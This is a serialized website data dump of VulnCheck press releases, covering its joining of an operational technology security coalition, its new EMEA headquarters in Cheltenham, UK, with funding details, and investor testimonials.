will participate in S4x26, a conference focused on industrial control systems and operational technology security. VulnCheck representatives will be available onsite, including during the Premium Cabana Session on Wednesday, Feb. 25, from 1 p.m. to 4:30 p.m. ET.",[184,7674,7675,7676,7679,7680,1201],{},"To learn more about OTCC and its members, visit ",[274,7677,7636],{"href":7636,"rel":7678},[278],". To learn more about VulnCheck and its exploit and vulnerability intelligence offerings, visit ",[274,7681,7517],{"href":7517,"rel":7682},[278],[246,7684,7686],{"id":7685},"about-the-operational-technology-cybersecurity-coalition","About the Operational Technology Cybersecurity Coalition",[184,7688,7689],{},"The OTCC is a diverse group of cybersecurity stakeholders dedicated to improving the cybersecurity of operational technology environments and strengthening public policy to secure critical infrastructure across the country.",[184,7691,7692,7693],{},"For more information, visit: ",[274,7694,7697],{"href":7695,"rel":7696},"https:\u002F\u002Fwww.otcybercoalition.orgAbout",[278],"https:\u002F\u002Fwww.otcybercoalition.org",[246,7699,302],{"id":301},[184,7701,7702,7703,7705,7706,1883,7710,1201],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation ",[7302,7704],{},"\nwithout relying on scores or delayed consensus. Follow the company on ",[274,7707,7578],{"href":7708,"rel":7709},"https:\u002F\u002Fcts.businesswire.com\u002Fct\u002FCT?id=smartlink&url=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fvulncheck%2F%3FviewAsMember%3Dtrue&esheet=54371212&newsitemid=20251207656200&lan=en-US&anchor=LinkedIn&index=5&md5=2cc19508986bfa8f455300e468428594",[278],[274,7711,7583],{"href":7712,"rel":7713},"https:\u002F\u002Fcts.businesswire.com\u002Fct\u002FCT?id=smartlink&url=https%3A%2F%2Fx.com%2Fvulncheckai&esheet=54371212&newsitemid=20251207656200&lan=en-US&anchor=X&index=6&md5=3cbb2e44b6fc035002323f68f420d735",[278],[184,7715,7716,7717,7721],{},"To learn more about VulnCheck, visit ",[274,7718,7589],{"href":7719,"rel":7720},"https:\u002F\u002Fcts.businesswire.com\u002Fct\u002FCT?id=smartlink&url=https%3A%2F%2Fvulncheck.com%2F&esheet=54371212&newsitemid=20251207656200&lan=en-US&anchor=https%3A%2F%2Fvulncheck.com%2F&index=7&md5=80ab20d77eb3e068827df9bfa30f3792",[278],[478,7722,1201],{},{"title":148,"searchDepth":149,"depth":149,"links":7724},[7725,7726],{"id":7685,"depth":149,"text":7686},{"id":301,"depth":149,"text":302},"Partnership expands collaboration to strengthen operational technology security and critical infrastructure protection",{"type":7729,"slug":7730},"press","vulncheck-joins-operational-technology-cybersecurity-coalition","\u002Fpress\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition",{"title":7614,"description":7727},"press\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition","b_M1ymwra6xS9w6TxHFulxxO_SNl6lPQeOQya21vLGc",{"id":7736,"title":7737,"articles":7738,"authors":7739,"body":7741,"date":7812,"description":7813,"extension":153,"meta":7814,"navigation":54,"path":7816,"seo":7817,"stem":7818,"__hash__":7819},"press\u002Fpress\u002Fvulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence.md","VulnCheck Establishes EMEA Headquarters in Cheltenham, UK Amid Soaring Global Demand for Exploit Intelligence",[],[7740],{"name":7622,"avatar":7623,"link":7624,"linkName":7625},{"type":145,"value":7742,"toc":7809},[7743,7752,7758,7761,7768,7771,7777,7780,7787,7794,7797,7801,7804],[184,7744,7745,7633,7748,7751],{},[478,7746,7747],{},"LEXINGTON, Mass., February 19, 2026 —",[274,7749,7452],{"href":7750},"www.vulncheck.com",", the exploit intelligence company, today announced it is establishing its EMEA headquarters in Cheltenham, United Kingdom, following a year of regional growth, including 319% year-over-year EMEA ARR growth and 100% customer growth. The move will strengthen VulnCheck’s ability to support customers across Europe, the Middle East and Africa as demand for exploit intelligence increases.",[7524,7753,7755],{"author":7449,"position":7754},"CEO of VulnCheck",[184,7756,7757],{},"EMEA has quickly become one of our fastest-growing regions globally. Establishing our EMEA headquarters in Cheltenham brings us closer to customers and partners while investing in a well-established U.K. cyber ecosystem. The depth of talent and collaboration here makes it the right location for our continued international growth.",[184,7759,7760],{},"Cheltenham is a key hub within the U.K.’s cyber sector, anchored by a strong public-private security community, leading academic institutions and a fast-growing cluster of cyber companies. VulnCheck’s new office will serve as its regional hub for customer engagement, partnerships and talent expansion, reinforcing the company’s long-term commitment to the U.K. market and beyond.",[7524,7762,7765],{"author":7763,"position":7764},"Phil Clement","Head of inward investment, growth and enterprise team at Gloucestershire County Council",[184,7766,7767],{},"I am delighted that U.S. firm VulnCheck have chosen Cheltenham in Gloucestershire for their U.K. base, as they grow the business after a successful fund raise. With demand increasing for cyber risk assessments, the company is well placed to utilise the talent pool in the Gloucestershire cluster and is a welcome addition to our cyber community.",[184,7769,7770],{},"The opening follows VulnCheck’s $25 million Series B funding round led by Sorenson Capital, with participation from National Grid Partners and existing investors, including Ten Eleven Ventures and In-Q-Tel. The investment brings the company’s total funding to $45 million and supports continued product innovation and global expansion.",[7524,7772,7774],{"author":7646,"position":7773},"Vice President, National Grid Partners",[184,7775,7776],{},"At National Grid Partners, we invest in technologies that strengthen resilience at scale. VulnCheck’s strong growth across EMEA reflects the urgency of today’s cyber threats and the value of its exploit and vulnerability intelligence platform. We’re excited to support the company’s expansion in the U.K. and beyond.",[184,7778,7779],{},"Last year, VulnCheck was selected as one of four finalists for the 2025 Black Hat Europe Startup Spotlight competition, underscoring its growing recognition within the global cybersecurity community. In 2024, the company participated in international cyber growth initiatives supported by Plexal, accelerating its engagement with the U.K. ecosystem and building relationships that helped pave the way for its Cheltenham expansion. Plexal is an innovation and growth company that strengthens the U.K.’s technology capabilities through collaboration.",[7524,7781,7784],{"author":7782,"position":7783},"Saj Huq","CCO at Plexal",[184,7785,7786],{},"We’re excited to welcome VulnCheck to the U.K., having collaborated with the team to support their international expansion. Establishing its EMEA HQ in the U.K. is a fantastic validator of our national cyber sector, which is buzzing with innovation, talent and solutions, so the team will certainly feel at home. VulnCheck is increasingly becoming a key technology partner to mission-critical organisations globally and their decision to grow in the U.K. further underscores the importance of international collaboration and interoperability across global partners. This also further validates Cheltenham's global relevance as a thriving cyber, technology and national security ecosystem – something that we’ve long been committed to supporting at Plexal. We look forward to building our existing relationship with VulnCheck and celebrating their continued success!",[184,7788,7789,7790,1201],{},"To learn more about VulnCheck and its exploit intelligence solutions, visit ",[274,7791,7750],{"href":7792,"rel":7793},"http:\u002F\u002Fwww.vulncheck.com",[278],[7795,7796],"hr",{},[1346,7798,7799],{"id":301},[478,7800,302],{},[184,7802,7803],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus. Follow the company on LinkedIn or X.",[184,7805,7716,7806,1201],{},[274,7807,7451],{"href":7451,"rel":7808},[278],{"title":148,"searchDepth":149,"depth":149,"links":7810},[7811],{"id":301,"depth":1498,"text":302},"2026-02-19","Company expands international presence following 319% year-over-year EMEA ARR growth and 100% customer growth",{"slug":7815},"vulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence","\u002Fpress\u002Fvulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence",{"title":7737,"description":7813},"press\u002Fvulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence","2Uq97nzn4XhrliITx1sCqGuqsXp_yJx9TUf3E9GnHuc",[7821],{"id":7822,"extension":8,"list":7823,"meta":7842,"stem":7843,"__hash__":7844},"quotes\u002Fquotes.yml",[7824,7829,7834,7837],{"quote":7825,"name":7826,"position":7827,"avatar":7828,"index":1474},"VulnCheck’s superpower is its ability to discover vulnerability intelligence that other solutions are unable to access, acquire, and have no ability to find - which is the key to security since you can’t secure what you don’t know about, Its deep and talented team with cross-disciplinary expertise in vulnerability research and exploit development gives them a perspective on the threat landscape that we have not seen anywhere else in the industry. The VulnCheck team is providing unique threat insights with much deeper exploit context that organizations formerly had no ability to find.","Tony Spinelli","Venture Partner at Sorenson Ventures","https:\u002F\u002Fwww.sorensoncapital.com\u002Fwp-content\u002Fuploads\u002F2023\u002F11\u002FTony-Spinelli-cropped-website-headshot.png",{"quote":7830,"name":7831,"position":7832,"avatar":7833,"index":149},"The core problem with existing solutions such as NVD is that vulnerability data alone does not give security teams enough context to help them prioritize remediation efforts, By enriching vulnerability data with information about exploit activity, VulnCheck is giving security teams the coveted ability to prioritize remediation of vulnerabilities based on a real-time assessment of exploit weaponization.","Katie Gray","Senior Partner at In-Q-Tel","https:\u002F\u002Fcybersecuritysummit.com\u002Fwp-content\u002Fuploads\u002F2018\u002F07\u002FGray-250x300-1-wpcf_200x240.jpg",{"quote":7835,"name":7449,"position":7836,"avatar":7503,"index":1498},"Our team’s mission is to autonomously gather and leverage exploit and vulnerability intelligence to manage the world’s vulnerabilities at scale,” said Bettini. “The investments we’ve secured show strong confidence in our vision. We are thrilled to be working with these strategic partners to fuel our next stage of growth.","Founder at VulnCheck",{"quote":7838,"name":7839,"position":7840,"avatar":7841,"index":1536},"VulnCheck's hypergrowth highlights its unique ability to address one of today's most pressing organizational challenges. As cybersecurity specialist investors, we backed VulnCheck because the current paradigms for threat intelligence and vulnerability management are fundamentally flawed. They require too much human intervention to distill the information needed to prioritize action. VulnCheck is disrupting these legacy approaches by autonomously collecting and integrating exploit and vulnerability intelligence at scale. Founder Anthony Bettini's unparalleled technical expertise, steady leadership, and disciplined approach to product development further cement the company's position as a game-changer in the industry.","Mark Hatfield","Founder \u002F General Partner, Ten Eleven Ventures","https:\u002F\u002Fwww.1011vc.com\u002Fwp-content\u002Fuploads\u002FTenEleven-Mark-Hatfield-Headshot.png",{},"quotes","lhJYzn0xmhA72_zvTMIXRwJRJ8z81BvOwuLTwqiaLfY",1776469823896]